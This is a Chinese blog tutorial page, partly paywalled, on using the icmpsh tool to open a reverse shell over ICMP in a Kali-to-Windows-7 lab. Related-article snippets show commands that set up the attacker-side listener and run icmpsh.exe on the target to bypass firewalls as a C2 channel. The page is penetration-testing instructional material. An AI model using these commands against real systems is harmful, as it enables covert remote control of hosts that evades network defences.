【渗透测试】ICMP隧道技术之icmpsh使用

最新推荐文章于 2024-08-16 09:11:28 发布
最新推荐文章于 2024-08-16 09:11:28 发布
阅读量2.4k 收藏 12
点赞数 2
CC 4.0 BY-SA版权
文章标签: python web安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42742658/article/details/120537355
本文详细介绍了如何使用icmpsh工具进行渗透测试,特别是在目标服务器只开放ICMP协议的情况下。首先,解释了icmpsh的使用场景,强调了它在无需管理员权限下的优势。接着,阐述了在Kali Linux和Windows之间建立ICMP隧道的步骤,包括下载和安装icmpsh,关闭Kali的ICMP应答,以及在目标机上执行icmpsh.exe。最后,提到了实验结束后恢复系统设置的注意事项,并提供了相关参考资料链接。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

目录

【渗透测试】ICMP隧道技术之icmpsh使用

一、使用场景

icmp隧道技术多用于服务器未开启任何端口时,但能够通过icmp协议通讯,即能够ping通对方

二、icmpsh

icmpsh是一个简单的ICMP反弹shell工具,拥有用C,Perl和Python实现的POSIX兼容主控端和一个win32的受控端。相比其他类似的开源工具来说,icmpsh的优点是在目标机器上运行时不需要管理员权限。
这一工具干净、简单并且便携。受控端(客户端)使用C语言实现。只能运行在目标Windows机器上,而主控端(服务端)由于已经有C和Perl实现的版本,而且之后又移植到了Python上,因此可以运行在任何平台的攻击者机器中。
icmpsh很容易被安装并用作c2通道。可以通过Github下载并在攻击者机器中部署icmpsh。

三、环境

kali:10.43.32.28/24

win7:10.43.32.30/24
同一个网段

1、下载工具:(git或者zip)

git clone https://github.com/inquisb/icmpsh.git

在这里插入图片描述

2、安装需要的python库文件

pip2 install impack
最低0.47元/天 解锁文章

200万优质内容无限畅学
ICMP侦察技术fping使用-渗透测试察打一体(2)
AI
05-13 571
这个工具在每个现代操作系统中几乎都有。对那些最重要的目标来说,ping和traceroute命令很多情况下都是禁用的,而过多地使用这些服务可能会触发网络安全系统中的警报。有了这些安全事件,你的目标肯定会安装和部署针对你的渗透测试的防御措施。它还允许你读取一个写有多个主机名或IP地址的文件,然后对这些主机发送ICMP的echo请求数据包。如果你得到的是超时,那么要么是你的ICMP请求被拦截了,要么是没有目标主机收到你的请求。-i n (在毫秒的时间内) 发送 ping 数据包之间的间隔 (默认为 25)
内网穿透_ICMP_icmpsh
tubug的博客
03-28 1270
常见的ICMP隧道工具有:icmpsh、PingTunnel、icmptunnel、powershell icmp等。数据包(例如:ping操作)的传输过程中,当目标主机不可达,或者请求超时,都是ICMP在运作(生成相应的错误信息)这样,当其他设备向你的机器发送 ICMP 请求时,icmpsh 可以截获这些请求并作出响应,而不是系统本身去响应。使用 icmpsh 工具时,它会监听网络上的 ICMP 请求,并模拟系统的 ICMP 去响应。为了防止系统本身去响应icmp,所以要关闭本机的icmp响应。
icmpsh使用
守拙的博客
07-11 1170
ICMP隧道:将TCP/UDP数据封装到ICMP的ping数据包中,从而穿过防火墙(防火墙通常不会过滤ping数据包),通常用于内网攻击中的绕过防火墙建立C2tongda。 常用的ICMP隧道工具有icmpsh、PingTunnel、icmptunnel、powershell icmp等。 下载地址:https://github.com/bdamele/icmpsh 使用前提: 目标主机为windows系统 本地机器安装python2环境,安装impacket类库 利用icmpsh
icmp隧道--icmpsh
ddr12231的博客
09-24 336
本地:ubantu 目标主机:windows 在ubantu上关闭自带的icmp回应 sysctl -w net.ipv4.icmp_echo_ighore_all=1 ubantu上启动 pip install impacket python icmpsh_m.py ubantuIP WindowsIP windows上 icmpsh.exe -t UbantuIP 详细命令 -t...
渗透测试ICMP隧道技术icmpsh使用(含流量分析)
一个偶尔更新,有点神经质的开发人员,专注于网络安全和人工智能应用领域。
09-29 3186
目录一、环境二、工具三、操作1、CentOS72、Win103、反弹成功四、C2流量分析1、正常的icmp流量2、恶意的icmp流量3、C2数据总结 一、环境 Win10:10.95.16.112 CentOS7:10.95.16.103 二、工具 icmpsh python2 三、操作 win10关闭防火墙,病毒检测,不然icmpsh.exe会被自动删除 centOS7安装python2对应的库文件用于支持icmpsh工具 pip2 install impacket 1、CentOS7 sysctl
隐藏c2隧道---ICMPicmpsh使用
qq_61142406的博客
02-12 4047
隐藏c2隧道---ICMPicmpsh使用
渗透测试笔记】之【内网渗透——网络层隧道(icmpsh、PingTunnel的使用icmp隧道反向shell
2401_84971057的博客
05-13 269
python icmpsh_m.py 192.168.8.35(攻击者IP) 192.168.8.18(受害者IP)icmpsh.exe -t 192.168.8.35(攻击者IP) -d 500 -b 30 -s 128。-s:字节最大数据缓冲区大小(以字节为单位)-t:攻击者IP,必选。-d:请求延迟(毫秒)-o:响应超时(毫秒)方式二:官网下载安装。
内网渗透之icmp隧道传输
最新发布
qq_55894976的博客
08-16 1073
为什么要建立隧道在实际的网络中,通常会通过各种边界设备·软/硬件防火墙、入侵检测系统来检查对外连接的情况,如果发现异常,会对通信进行阻断。​# 什么是隧道就是一种绕过端口屏蔽的方式,防火墙两端的数据包通过防火墙所允许的数据包类型或者端口进行封装,然后穿过防火墙,与对方通信,当被封装的数据包到达目的地时,将数据包还原,并将还原后的数据包发送到相应的服务器上​#常见的隧道列举如下:网络层:ipv6隧道 icmp隧道 gre隧道传输层:TCP隧道 UDP隧道 常规端口转发。
【内网流量操控技术六】icmp隧道之icmpsh
redwand的博客
02-11 1867
今天是大年三十,先给大家拜个早年,虽然是年末最后一天,但对于有技术信仰的我们来说,其实每一天都是第0天,遂积跬步,记录一篇。前面我们学习了ssh隧道、dns隧道,这些隧道从tcp/ip七层协议来看,多是通过应用层或传输层协议穿透防火墙。那么当防火墙如果不开任何端口,我们应该如何穿透绕过防火墙出站规则呢,本节我们通过学习icmpsh来解决服务器未开端口时,如何通过icmp隧道穿透防火墙,其原理虽然简单,但动手一试发现有很多坑值得避免。
小工具icmpsh的基本操作
carmi的博客
03-10 458
小工具icmpsh的基本操作 基础介绍 原理:通过icmp这个协议进行反弹一个shell 前提条件:Kali(192.168.126.134)与Windows7(192.168.126.129)靶机需要在同一个网段(内网)当中,可以进行通信 操作流程 1、github上下载资源,复制进Kali,进行解压 GitHub - bdamele/icmpsh: Simple reverse ICMP s...
内网渗透系列:内网隧道之icmpsh
闵行小鱼塘
04-10 1660
本文研究ICMP隧道的一个工具,icmpsh
icmpsh.zip
05-17
内部网络中的大多数系统都位于防火墙和公司代理之后,以便控制入站和出站Internet流量。防火墙可以阻止反向并绑定TCP连接。但是大多数情况下允许ICMP流量。因此,可以将此协议用作隐蔽通道,以便获取shell并在目标主机上远程执行命令。
icmpsh:基于 ICMP 的 shell 工具
gitblog_00096的博客
03-14 436
icmpsh:基于 ICMP 的 shell 工具 icmpsh 是一个基于 ICMP(Internet Control Message Protocol)的 shell 工具,它允许你通过 ICMP 请求在目标主机上执行命令并获取结果。 什么是 ICMPICMP(Internet Control Message Protocol)是 Internet 协议簇的一部分,用于在网络中发送控制消息...
ICMP隧道之icmpsh利用
Zlirving_的博客
02-10 784
ICMP隧道 icmp隧道简单、实用,是一个比较特殊的协议。在一般的通信协议里,如果两台设备进行通信肯定需要开放端口,而在icmp协议中则不需要。最常见的icmp消息为ping命令的回复,攻击者可以利用命令行得到比回复更多的icmp请求。 利用价值,在利用 ping 穿透防火墙的检测,因为通常防火墙是不会屏蔽 ping 数据包的。 icmpsh icmpsh是一个简单的ICMP反弹shell工具,拥有用C,Perl和Python实现的POSIX兼容主控端和一个win32的受控端。相比其他类似的开源工具来说,
icmpsh建立ICMP隧道
大方子
01-27 4835
Kali:192.168.61.145 Win7:192.168.61.128 Kali上先下载icmpsh git clone https://github.com/inquisb/icmpsh.git 安装python-impacket apt-get install python-impacket 关闭Kali系统自己的ping回复(实验完成后,记得设回0) 然后进入icmpsh文件夹内执行 # python icmpsh_m.py [攻击机IP][目标IP] python icmpsh_m
利用icmpsh建立icmp隧道反弹shell
xj28555的博客
09-25 820
首先在kali上安装icmpsh软件,软件地址https://github.com/inquisb/icmpsh.git 我们可以直接用git克隆过来git clonehttps://github.com/inquisb/icmpsh.git 然后我们还需要来安装python-impacket类库以保证对TCP、UDP、ICMP等协议的访问 pip2 install impacket 接下来我们还需要关闭我们之前的ping命令应答程序,这样可以防止内核自己对ping包进行响应。 sysc.
ICMPSH的学习ICMP反弹shell
来到了学渣的博客
06-04 1484
ICMP隧道 最常见的ping命令就是利用的ICMP协议,使用该协议反弹shell,两台机器不需要开放端口,ICMP隧道简单好用。 实验环境 Kali 192.168.10.144 win7 192.168.10.129 kali安装好icmpsh工具 root@kali:~# git clone https://github.com/inquisb/icmpsh.git 安装icmpsh的依赖包 root@kali:~# apt-get install python-impacket 执行之前最重要
ICMP隧道技术 - icmpsh
shawdow_bug的博客
09-12 1062
ICMP隧道工具 icmpsh 使用
icmpsh搭建icmp隧道
hentai_uncle的博客
09-11 556
icmp隧道 icmpsh 使用kali作为攻击机, 使用win7作为受害机 kali安装icmpsh git clone https://github.com/inquisb/icmpsh.git apt-get install python-impacket //这步很可能存在问题 问题的解决方式: cp /etc/apt/sources.list /etc/apt/sources.list.bak //备份 vim /etc/apt/sources.list
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

久违 °

我看到了月亮

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值